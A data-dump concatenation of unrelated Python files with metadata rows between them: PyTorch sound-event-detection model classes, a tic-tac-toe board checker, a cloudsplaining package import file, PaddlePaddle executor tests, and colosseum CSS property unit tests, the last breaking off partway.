modules = list(self.base_model.children())
self.base_model = nn.Sequential(*modules[:-2])
self.fc1 = nn.Linear(in_features, in_features, bias=True)
self.fc_audioset = nn.Linear(in_features, num_classes, bias=True)
self.init_weight()
def init_weight(self):
init_layer(self.fc1)
init_layer(self.fc_audioset)
def forward(self, input):
frames_num = input.size(3)
# (batch_size, channels, freq, frames)
x = self.base_model(input)
# (batch_size, channels, frames)
x = torch.mean(x, dim=2)
# channel smoothing
x1 = F.max_pool1d(x, kernel_size=3, stride=1, padding=1)
x2 = F.avg_pool1d(x, kernel_size=3, stride=1, padding=1)
x = x1 + x2
x = F.dropout(x, p=0.5, training=self.training)
x = x.transpose(1, 2)
x = F.relu_(self.fc1(x))
x = F.dropout(x, p=0.5, training=self.training)
segmentwise_logit = self.fc_audioset(x)
(clipwise_logit, _) = torch.max(segmentwise_logit, dim=1)
segmentwise_output = torch.sigmoid(segmentwise_logit)
clipwise_output = torch.sigmoid(clipwise_logit)
interpolate_ratio = frames_num // segmentwise_output.size(1)
# Get framewise output
framewise_output = interpolate(segmentwise_output,
interpolate_ratio)
framewise_output = pad_framewise_output(framewise_output, frames_num)
framewise_logit = interpolate(segmentwise_logit, interpolate_ratio)
framewise_logit = pad_framewise_output(framewise_logit, frames_num)
output_dict = {
"framewise_output": framewise_output,
"segmentwise_output": segmentwise_output,
"logit": clipwise_logit,
"framewise_logit": framewise_logit,
"clipwise_output": clipwise_output
}
return output_dict
class EfficientNetSED(nn.Module):
def __init__(self, base_model_name: str, pretrained=False,
num_classes=264):
super().__init__()
self.interpolate_ratio = 30 # Downsampled ratio
if pretrained:
self.base_model = EfficientNet.from_pretrained(base_model_name)
else:
self.base_model = EfficientNet.from_name(base_model_name)
in_features = self.base_model._fc.in_features
self.fc1 = nn.Linear(in_features, in_features, bias=True)
self.att_block = AttBlockV2(in_features, num_classes, activation="sigmoid")
self.init_weight()
def init_weight(self):
init_layer(self.fc1)
def forward(self, input):
frames_num = input.size(3)
# (batch_size, channels, freq, frames)
x = self.base_model.extract_features(input)
# (batch_size, channels, frames)
x = torch.mean(x, dim=2)
# channel smoothing
x1 = F.max_pool1d(x, kernel_size=3, stride=1, padding=1)
x2 = F.avg_pool1d(x, kernel_size=3, stride=1, padding=1)
x = x1 + x2
x = F.dropout(x, p=0.5, training=self.training)
x = x.transpose(1, 2)
x = F.relu_(self.fc1(x))
x = x.transpose(1, 2)
x = F.dropout(x, p=0.5, training=self.training)
(clipwise_output, norm_att, segmentwise_output) = self.att_block(x)
logit = torch.sum(norm_att * self.att_block.cla(x), dim=2)
segmentwise_logit = self.att_block.cla(x).transpose(1, 2)
segmentwise_output = segmentwise_output.transpose(1, 2)
interpolate_ratio = frames_num // segmentwise_output.size(1)
# Get framewise output
framewise_output = interpolate(segmentwise_output,
interpolate_ratio)
framewise_output = pad_framewise_output(framewise_output, frames_num)
framewise_logit = interpolate(segmentwise_logit, interpolate_ratio)
framewise_logit = pad_framewise_output(framewise_logit, frames_num)
output_dict = {
"framewise_output": framewise_output,
"segmentwise_output": segmentwise_output,
"logit": logit,
"framewise_logit": framewise_logit,
"clipwise_output": clipwise_output
}
return output_dict
| 34.898058
| 83
| 0.643483
| 879
| 7,189
| 4.988623
| 0.113766
| 0.085519
| 0.050399
| 0.061574
| 0.872064
| 0.853592
| 0.853592
| 0.853592
| 0.853592
| 0.853592
| 0
| 0.020064
| 0.258172
| 7,189
| 205
| 84
| 35.068293
| 0.802175
| 0.052024
| 0
| 0.814286
| 0
| 0
| 0.032505
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064286
| false
| 0
| 0.05
| 0
| 0.157143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96b78bc8c3c27c4dbe8b3c27b0af4cc2e23fd612
| 2,536
|
py
|
Python
|
tictactoes/tic_tac_toe_1.py
|
SeanRavenhill/Python-Playground
|
bc638be8ec48fa54946395fd93a6944075438fb3
|
[
"MIT"
] | null | null | null |
tictactoes/tic_tac_toe_1.py
|
SeanRavenhill/Python-Playground
|
bc638be8ec48fa54946395fd93a6944075438fb3
|
[
"MIT"
] | null | null | null |
tictactoes/tic_tac_toe_1.py
|
SeanRavenhill/Python-Playground
|
bc638be8ec48fa54946395fd93a6944075438fb3
|
[
"MIT"
] | null | null | null |
play = "_OOOO_X_X"
print("---------")
print("| " + play[0] + " " + play[1] + " " + play[2] + " |")
print("| " + play[3] + " " + play[4] + " " + play[5] + " |")
print("| " + play[6] + " " + play[7] + " " + play[8] + " |")
print("---------")
plays = [x for x in play]
if play[0] == play[1] and play[1] == play[2]: # Vert Top check
if play[3] == play[4] and play[4] == play[5]: # Vert Mid cross check
print("Impossible")
elif play[6] == play[7] and play[7] == play[8]: # Vert Low cross check
print("Impossible")
else:
print(play[0], "wins")
elif play[3] == play[4] and play[4] == play[5]: # Vert Mid check
if play[0] == play[1] and play[1] == play[2]: # Vert Top cross check
print("Impossible")
elif play[6] == play[7] and play[7] == play[8]: # Vert Low cross check
print("Impossible")
else:
print(play[3], "wins")
elif play[6] == play[7] and play[7] == play[8]: # Vert Low check
if play[0] == play[1] and play[1] == play[2]: # Vert Top cross check
print("Impossible")
if play[3] == play[4] and play[4] == play[5]: # Vert Mid cross check
print("Impossible")
else:
print(play[6], "wins")
elif play[0] == play[3] and play[3] == play[6]: # Hori Left check
if play[1] == play[4] and play[4] == play[7]: # Hori Mid cross check
print("Impossible")
elif play[2] == play[5] and play[5] == play[8]: # Hori Right cross check
print("Impossible")
else:
print(play[0], "wins")
elif play[1] == play[4] and play[4] == play[7]: # Hori Mid check
if play[0] == play[3] and play[3] == play[6]: # Hori Left cross check
print("Impossible")
elif play[2] == play[5] and play[5] == play[8]: # Hori Right cross check
print("Impossible")
else:
print(play[1], "wins")
elif play[2] == play[5] and play[5] == play[8]: # Hori Right check
if play[0] == play[3] and play[3] == play[6]: # Hori Left cross check
print("Impossible")
elif play[1] == play[4] and play[4] == play[7]: # Hori Mid cross check
print("Impossible")
else:
print(play[2], "wins")
elif play[0] == play[4] and play[4] == play[8]: # Diag Down Left Right Check
print(play[0], "wins")
elif play[6] == play[4] and play[4] == play[2]: # Diag Up Left Right Check
print(play[6], "wins")
elif abs(plays.count("X") - plays.count("O")) >= 2:
print("Impossible")
elif "_" in plays[0:7] or " " in plays[0:7]:
print("Game not finished")
else:
print("Draw")
| 40.253968
| 77
| 0.539826
| 399
| 2,536
| 3.421053
| 0.105263
| 0.102564
| 0.131868
| 0.21978
| 0.832234
| 0.778755
| 0.737729
| 0.737729
| 0.718681
| 0.718681
| 0
| 0.0536
| 0.249606
| 2,536
| 62
| 78
| 40.903226
| 0.663689
| 0.158517
| 0
| 0.711864
| 0
| 0
| 0.109797
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.474576
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
737653856442575973e895d13957ebdf025eb7f2
| 286
|
py
|
Python
|
cloudsplaining/command/__init__.py
|
roock/cloudsplaining
|
5bda122de41f945e74b977ce109800fd67aa66d4
|
[
"BSD-3-Clause"
] | 3
|
2021-06-08T16:05:09.000Z
|
2021-12-11T19:42:41.000Z
|
cloudsplaining/command/__init__.py
|
roock/cloudsplaining
|
5bda122de41f945e74b977ce109800fd67aa66d4
|
[
"BSD-3-Clause"
] | 5
|
2020-05-06T21:04:25.000Z
|
2021-02-12T01:15:55.000Z
|
cloudsplaining/command/__init__.py
|
roock/cloudsplaining
|
5bda122de41f945e74b977ce109800fd67aa66d4
|
[
"BSD-3-Clause"
] | 3
|
2021-06-17T10:02:10.000Z
|
2022-02-14T22:27:15.000Z
|
# pylint: disable=missing-module-docstring
from cloudsplaining.command import create_exclusions_file
from cloudsplaining.command import expand_policy
from cloudsplaining.command import download
from cloudsplaining.command import scan
from cloudsplaining.command import scan_policy_file
| 40.857143
| 57
| 0.884615
| 35
| 286
| 7.085714
| 0.457143
| 0.362903
| 0.504032
| 0.625
| 0.282258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08042
| 286
| 6
| 58
| 47.666667
| 0.942966
| 0.13986
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
73c12a772ca191c2d01fad736a723127f9d7c741
| 14,507
|
py
|
Python
|
framework_api/test_static_executor.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 14
|
2020-03-04T07:52:07.000Z
|
2022-02-14T01:39:14.000Z
|
framework_api/test_static_executor.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 19
|
2020-03-04T03:52:10.000Z
|
2021-12-23T07:02:07.000Z
|
framework_api/test_static_executor.py
|
zjjlivein/continuous_integration
|
c8825f32136fdd425389702c37ded08d6fd28a26
|
[
"Apache-2.0"
] | 26
|
2020-03-04T05:39:09.000Z
|
2022-02-14T01:43:28.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test static executor."""
import paddle.fluid as fluid
import numpy as np
import tools
import paddle.fluid.compiler as compiler
import os
import time
import platform
def test_global_scope():
"""
test global_scope
:return:
"""
fluid.global_scope().var("data").get_tensor().set(
np.ones((1, 2)), fluid.CPUPlace())
data = np.array(fluid.global_scope().find_var("data").get_tensor())
tools.compare(data, [[1, 1]])
def test_scope_guard():
"""
test scope_guard
:return:
"""
new_scope = fluid.Scope()
with fluid.scope_guard(new_scope):
fluid.global_scope().var("data").get_tensor().set(
np.ones((1, 2)), fluid.CPUPlace())
data = np.array(new_scope.find_var("data").get_tensor())
tools.compare(data, [[1, 1]])
def test_Executor():
"""
test Executor
:return:
"""
try:
place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda(
) else fluid.CPUPlace()
exe = fluid.Executor(place)
train_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(train_program, startup_program):
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
startup_program.random_seed = 1
exe.run(startup_program)
x = np.random.random(size=(10, 1)).astype('float32')
for i in range(1000):
loss_data = exe.run(train_program,
feed={"X": x},
fetch_list=[loss.name])
assert True
except Exception:
assert False
def test_Executor1():
"""
test Executor with compileprogram
:return:
"""
try:
place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda(
) else fluid.CPUPlace()
exe = fluid.Executor(place)
train_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(train_program, startup_program):
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
startup_program.random_seed = 1
exe.run(startup_program)
x = np.random.random(size=(10, 1)).astype('float32')
compiled_prog = compiler.CompiledProgram(
train_program).with_data_parallel(loss_name=loss.name)
if not fluid.is_compiled_with_cuda():
os.environ["CPU_NUM"] = "2"
for i in range(1000):
loss_data = exe.run(compiled_prog,
feed={"X": x},
fetch_list=[loss.name])
assert True
except Exception:
assert False
def test_Executor2():
"""
test Executor with exe.close()
:return:
"""
try:
place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda(
) else fluid.CPUPlace()
exe = fluid.Executor(place)
train_program = fluid.Program()
startup_program = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(train_program, startup_program):
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
startup_program.random_seed = 1
exe.run(startup_program)
x = np.random.random(size=(10, 1)).astype('float32')
compiled_prog = compiler.CompiledProgram(
train_program).with_data_parallel(loss_name=loss.name)
if not fluid.is_compiled_with_cuda():
os.environ["CPU_NUM"] = "2"
exe.close()
for i in range(1000):
loss_data = exe.run(compiled_prog,
feed={"X": x},
fetch_list=[loss.name])
assert False
except Exception:
assert True
def test_Executor3():
"""
test Executor with run()
:return:
"""
place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda(
) else fluid.CPUPlace()
exe = fluid.Executor(place)
train_program = fluid.Program()
startup_program = fluid.Program()
startup_program.random_seed = 33
train_program.random_seed = 33
np.random.seed(33)
with fluid.unique_name.guard():
with fluid.program_guard(train_program, startup_program):
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
startup_program.random_seed = 1
exe.run(startup_program)
x = np.ones(shape=(10, 1)).astype('float32')
compiled_prog = compiler.CompiledProgram(
train_program).with_data_parallel(loss_name=loss.name)
if not fluid.is_compiled_with_cuda():
os.environ["CPU_NUM"] = "2"
else:
os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
for i in range(1000):
loss_data = exe.run(compiled_prog,
feed={"X": x},
fetch_list=[loss.name])[0]
if platform.system() == "Darwin" or platform.system() == "Linux":
tools.compare(loss_data, [-1.9068239, -1.9068239])
else:
tools.compare(loss_data, [-1.9068239])
def test_Executor4():
"""
test Executor with fetch_var_name feed_var_name
:return:
"""
place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda(
) else fluid.CPUPlace()
exe = fluid.Executor(place)
train_program = fluid.Program()
startup_program = fluid.Program()
startup_program.random_seed = 33
train_program.random_seed = 33
np.random.seed(33)
with fluid.unique_name.guard():
with fluid.program_guard(train_program, startup_program):
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
startup_program.random_seed = 1
exe.run(startup_program)
x = np.ones(shape=(10, 1)).astype('float32')
compiled_prog = compiler.CompiledProgram(
train_program).with_data_parallel(loss_name=loss.name)
if not fluid.is_compiled_with_cuda():
os.environ["CPU_NUM"] = "2"
else:
os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
for i in range(1000):
loss_data = exe.run(compiled_prog,
feed={"X": x},
fetch_list=[loss.name],
feed_var_name="f",
fetch_var_name="c")[0]
if platform.system() == "Darwin" or platform.system() == "Linux":
tools.compare(loss_data, [-1.9068239, -1.9068239])
else:
tools.compare(loss_data, [-1.9068239])
def test_Executor5():
"""
test Executor with use_program_cache=True
:return:
"""
place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda(
) else fluid.CPUPlace()
exe = fluid.Executor(place)
train_program = fluid.Program()
startup_program = fluid.Program()
startup_program.random_seed = 33
train_program.random_seed = 33
np.random.seed(33)
with fluid.unique_name.guard():
with fluid.program_guard(train_program, startup_program):
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
startup_program.random_seed = 1
exe.run(startup_program)
x = np.ones(shape=(10, 1)).astype('float32')
if not fluid.is_compiled_with_cuda():
os.environ["CPU_NUM"] = "2"
start = time.time()
for i in range(1000):
loss_data = exe.run(train_program,
feed={"X": x},
fetch_list=[loss.name],
use_program_cache=True)[0]
end1 = time.time() - start
print(end1)
tools.compare(loss_data, [-1.9068239])
place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda(
) else fluid.CPUPlace()
exe = fluid.Executor(place)
train_program = fluid.Program()
startup_program = fluid.Program()
startup_program.random_seed = 33
train_program.random_seed = 33
np.random.seed(33)
with fluid.unique_name.guard():
with fluid.program_guard(train_program, startup_program):
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
startup_program.random_seed = 1
exe.run(startup_program)
x = np.ones(shape=(10, 1)).astype('float32')
if not fluid.is_compiled_with_cuda():
os.environ["CPU_NUM"] = "2"
start = time.time()
for i in range(1000):
loss_data = exe.run(train_program,
feed={"X": x},
fetch_list=[loss.name],
use_program_cache=False)[0]
end2 = time.time() - start
print(end2)
tools.compare(loss_data, [-1.9068239])
assert end2 > end1
def test_Executor6():
"""
test Executor with return_numpy=False
:return:
"""
place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda(
) else fluid.CPUPlace()
exe = fluid.Executor(place)
train_program = fluid.Program()
startup_program = fluid.Program()
startup_program.random_seed = 33
train_program.random_seed = 33
np.random.seed(33)
with fluid.unique_name.guard():
with fluid.program_guard(train_program, startup_program):
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
startup_program.random_seed = 1
exe.run(startup_program)
x = np.ones(shape=(10, 1)).astype('float32')
compiled_prog = compiler.CompiledProgram(
train_program).with_data_parallel(loss_name=loss.name)
if not fluid.is_compiled_with_cuda():
os.environ["CPU_NUM"] = "2"
for i in range(1000):
loss_data = exe.run(compiled_prog,
feed={"X": x},
fetch_list=[loss.name],
return_numpy=False)
if "paddle.fluid.core_avx.LoDTensor" in loss_data.__str__():
assert True
else:
assert False
def test_Executor7():
"""
test Executor with scope=newscope
:return:
"""
place = fluid.CUDAPlace(0) if fluid.is_compiled_with_cuda(
) else fluid.CPUPlace()
exe = fluid.Executor(place)
train_program = fluid.Program()
startup_program = fluid.Program()
startup_program.random_seed = 33
train_program.random_seed = 33
np.random.seed(33)
fkscope = fluid.Scope()
with fluid.scope_guard(fkscope):
with fluid.unique_name.guard():
with fluid.program_guard(train_program, startup_program):
data = fluid.layers.data(name='X', shape=[1], dtype='float32')
hidden = fluid.layers.fc(input=data, size=10)
loss = fluid.layers.mean(hidden)
fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
startup_program.random_seed = 1
exe.run(startup_program)
x = np.ones(shape=(10, 1)).astype('float32')
compiled_prog = compiler.CompiledProgram(
train_program).with_data_parallel(loss_name=loss.name)
if not fluid.is_compiled_with_cuda():
os.environ["CPU_NUM"] = "2"
else:
os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
for i in range(1000):
loss_data = exe.run(compiled_prog,
feed={"X": x},
fetch_list=[loss.name],
scope=fkscope)[0]
if platform.system() == "Darwin" or platform.system(
) == "Linux":
tools.compare(loss_data, [-1.9068239, -1.9068239])
else:
tools.compare(loss_data, [-1.9068239])
| 39.636612
| 78
| 0.562625
| 1,683
| 14,507
| 4.674985
| 0.104575
| 0.074733
| 0.064057
| 0.041052
| 0.839731
| 0.839731
| 0.825241
| 0.825241
| 0.825241
| 0.825241
| 0
| 0.034918
| 0.322879
| 14,507
| 365
| 79
| 39.745205
| 0.766059
| 0.068725
| 0
| 0.864583
| 0
| 0
| 0.027214
| 0.00233
| 0
| 0
| 0
| 0
| 0.03125
| 1
| 0.034722
| false
| 0
| 0.024306
| 0
| 0.059028
| 0.006944
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb77b4dd7b416b42abd7b6197143de0f140d07b3
| 19,159
|
py
|
Python
|
tests/test_declaration.py
|
newbazz/colosseum
|
5089a31ccca0df6c0c0aa20bdf7b5888007d45e7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_declaration.py
|
newbazz/colosseum
|
5089a31ccca0df6c0c0aa20bdf7b5888007d45e7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_declaration.py
|
newbazz/colosseum
|
5089a31ccca0df6c0c0aa20bdf7b5888007d45e7
|
[
"BSD-3-Clause"
] | null | null | null |
from unittest import TestCase
from colosseum import engine as css_engine
from colosseum.colors import GOLDENROD, NAMED_COLOR, REBECCAPURPLE
from colosseum.constants import AUTO, BLOCK, INLINE, TABLE, Choices
from colosseum.declaration import CSS, validated_property
from colosseum.units import percent, px
from .utils import TestNode
class PropertyChoiceTests(TestCase):
def test_none(self):
class MyObject:
prop = validated_property('prop', choices=Choices(None), initial=None)
obj = MyObject()
self.assertIsNone(obj.prop)
with self.assertRaises(ValueError):
obj.prop = 10
with self.assertRaises(ValueError):
obj.prop = 20 * px
with self.assertRaises(ValueError):
obj.prop = 30 * percent
with self.assertRaises(ValueError):
obj.prop = REBECCAPURPLE
with self.assertRaises(ValueError):
obj.prop = '#112233'
with self.assertRaises(ValueError):
obj.prop = 'a'
with self.assertRaises(ValueError):
obj.prop = 'b'
obj.prop = None
obj.prop = 'none'
# Check the error message
try:
obj.prop = 'invalid'
self.fail('Should raise ValueError')
except ValueError as v:
self.assertEqual(
str(v),
"Invalid value 'invalid' for CSS property 'prop'; Valid values are: none"
)
def test_allow_length(self):
class MyObject:
prop = validated_property('prop', choices=Choices(length=True), initial=0)
obj = MyObject()
self.assertEqual(obj.prop, 0 * px)
obj.prop = 10
obj.prop = 20 * px
obj.prop = 30 * percent
with self.assertRaises(ValueError):
obj.prop = REBECCAPURPLE
with self.assertRaises(ValueError):
obj.prop = '#112233'
with self.assertRaises(ValueError):
obj.prop = 'a'
with self.assertRaises(ValueError):
obj.prop = 'b'
with self.assertRaises(ValueError):
obj.prop = None
with self.assertRaises(ValueError):
obj.prop = 'none'
# Check the error message
try:
obj.prop = 'invalid'
self.fail('Should raise ValueError')
except ValueError as v:
self.assertEqual(
str(v),
"Invalid value 'invalid' for CSS property 'prop'; Valid values are: <length>"
)
def test_allow_percentage(self):
class MyObject:
prop = validated_property('prop', choices=Choices(percentage=True), initial=99 * percent)
obj = MyObject()
self.assertEqual(obj.prop, 99 * percent)
with self.assertRaises(ValueError):
obj.prop = 10
with self.assertRaises(ValueError):
obj.prop = 20 * px
obj.prop = 30 * percent
with self.assertRaises(ValueError):
obj.prop = REBECCAPURPLE
with self.assertRaises(ValueError):
obj.prop = '#112233'
with self.assertRaises(ValueError):
obj.prop = 'a'
with self.assertRaises(ValueError):
obj.prop = 'b'
with self.assertRaises(ValueError):
obj.prop = None
with self.assertRaises(ValueError):
obj.prop = 'none'
# Check the error message
try:
obj.prop = 'invalid'
self.fail('Should raise ValueError')
except ValueError as v:
self.assertEqual(
str(v),
"Invalid value 'invalid' for CSS property 'prop'; Valid values are: <percentage>"
)
def test_allow_integer(self):
class MyObject:
prop = validated_property('prop', choices=Choices(integer=True), initial=0)
obj = MyObject()
self.assertEqual(obj.prop, 0)
obj.prop = 10
with self.assertRaises(ValueError):
obj.prop = 20 * px
with self.assertRaises(ValueError):
obj.prop = 30 * percent
with self.assertRaises(ValueError):
obj.prop = REBECCAPURPLE
with self.assertRaises(ValueError):
obj.prop = '#112233'
with self.assertRaises(ValueError):
obj.prop = 'a'
with self.assertRaises(ValueError):
obj.prop = 'b'
with self.assertRaises(ValueError):
obj.prop = None
with self.assertRaises(ValueError):
obj.prop = 'none'
# Check the error message
try:
obj.prop = 'invalid'
self.fail('Should raise ValueError')
except ValueError as v:
self.assertEqual(
str(v),
"Invalid value 'invalid' for CSS property 'prop'; Valid values are: <integer>"
)
def test_allow_color(self):
class MyObject:
prop = validated_property('prop', choices=Choices(color=True), initial='goldenrod')
obj = MyObject()
self.assertEqual(obj.prop, NAMED_COLOR[GOLDENROD])
with self.assertRaises(ValueError):
obj.prop = 10
with self.assertRaises(ValueError):
obj.prop = 20 * px
with self.assertRaises(ValueError):
obj.prop = 30 * percent
obj.prop = REBECCAPURPLE
obj.prop = '#112233'
with self.assertRaises(ValueError):
obj.prop = 'a'
with self.assertRaises(ValueError):
obj.prop = 'b'
with self.assertRaises(ValueError):
obj.prop = None
with self.assertRaises(ValueError):
obj.prop = 'none'
# Check the error message
try:
obj.prop = 'invalid'
self.fail('Should raise ValueError')
except ValueError as v:
self.assertEqual(
str(v),
"Invalid value 'invalid' for CSS property 'prop'; Valid values are: <color>"
)
def test_values(self):
class MyObject:
prop = validated_property('prop', choices=Choices('a', 'b', None), initial='a')
obj = MyObject()
self.assertEqual(obj.prop, 'a')
with self.assertRaises(ValueError):
obj.prop = 10
with self.assertRaises(ValueError):
obj.prop = 20 * px
with self.assertRaises(ValueError):
obj.prop = 30 * percent
with self.assertRaises(ValueError):
obj.prop = REBECCAPURPLE
with self.assertRaises(ValueError):
obj.prop = '#112233'
obj.prop = 'a'
obj.prop = 'b'
obj.prop = None
obj.prop = 'none'
# Check the error message
try:
obj.prop = 'invalid'
self.fail('Should raise ValueError')
except ValueError as v:
self.assertEqual(
str(v),
"Invalid value 'invalid' for CSS property 'prop'; Valid values are: a, b, none"
)
def test_all_choices(self):
class MyObject:
prop = validated_property('prop', choices=Choices(
'a', 'b', None,
integer=True, length=True, percentage=True, color=True
), initial=None)
obj = MyObject()
obj.prop = 10
obj.prop = 20 * px
obj.prop = 30 * percent
obj.prop = REBECCAPURPLE
obj.prop = '#112233'
obj.prop = 'a'
obj.prop = 'b'
obj.prop = None
obj.prop = 'none'
# Check the error message
try:
obj.prop = 'invalid'
self.fail('Should raise ValueError')
except ValueError as v:
self.assertEqual(
str(v),
"Invalid value 'invalid' for CSS property 'prop'; "
"Valid values are: <color>, <integer>, <length>, <percentage>, a, b, none"
)
def test_string_symbol(self):
class MyObject:
prop = validated_property('prop', choices=Choices(AUTO, None), initial=None)
obj = MyObject()
# Set a symbolic value using the string value of the symbol
# We can't just use the string directly, though - that would
# get optimized by the compiler. So we create a string and
# transform it into the value we want.
val = 'AUTO'
obj.prop = val.lower()
# Both equality and instance checking should work.
self.assertEqual(obj.prop, AUTO)
self.assertIs(obj.prop, AUTO)
class CssDeclarationTests(TestCase):
def test_engine(self):
node = TestNode(style=CSS())
self.assertEqual(node.style.engine(), css_engine)
def test_auto_default_property(self):
node = TestNode(style=CSS())
node.layout.dirty = None
# Default value is AUTO
self.assertIs(node.style.width, AUTO)
self.assertIsNone(node.style.dirty)
# Modify the value
node.style.width = 10
self.assertEqual(node.style.width, 10)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Set the value to the same value.
# Dirty flag is not set.
node.style.width = 10
self.assertEqual(node.style.width, 10)
self.assertFalse(node.style.dirty)
# Set the value to something new
# Dirty flag is set.
node.style.width = 20
self.assertEqual(node.style.width, 20)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Clear the property
del node.style.width
self.assertIs(node.style.width, AUTO)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Clear the property again.
# The underlying attribute won't exist, so this
# should be a no-op.
del node.style.width
self.assertIs(node.style.width, AUTO)
self.assertFalse(node.style.dirty)
def test_0_default_property(self):
node = TestNode(style=CSS())
node.layout.dirty = None
# Default value is 0
self.assertEqual(node.style.border_top_width, 0)
self.assertIsNone(node.style.dirty)
# Modify the value
node.style.border_top_width = 10
self.assertEqual(node.style.border_top_width, 10)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Set the value to the same value.
# Dirty flag is not set.
node.style.border_top_width = 10
self.assertEqual(node.style.border_top_width, 10)
self.assertFalse(node.style.dirty)
# Set the value to something new
# Dirty flag is set.
node.style.border_top_width = 20
self.assertEqual(node.style.border_top_width, 20)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Clear the property
del node.style.border_top_width
self.assertEqual(node.style.border_top_width, 0)
self.assertTrue(node.style.dirty)
def test_None_default_property(self):
node = TestNode(style=CSS())
node.layout.dirty = None
# Default value is None
self.assertIsNone(node.style.max_width)
self.assertIsNone(node.style.dirty)
# Modify the value
node.style.max_width = 10
self.assertEqual(node.style.max_width, 10)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Set the value to the same value.
# Dirty flag is not set.
node.style.max_width = 10
self.assertEqual(node.style.max_width, 10)
self.assertFalse(node.style.dirty)
# Set the value to something new
# Dirty flag is set.
node.style.max_width = 20
self.assertEqual(node.style.max_width, 20)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Clear the property
del node.style.max_width
self.assertIsNone(node.style.max_width)
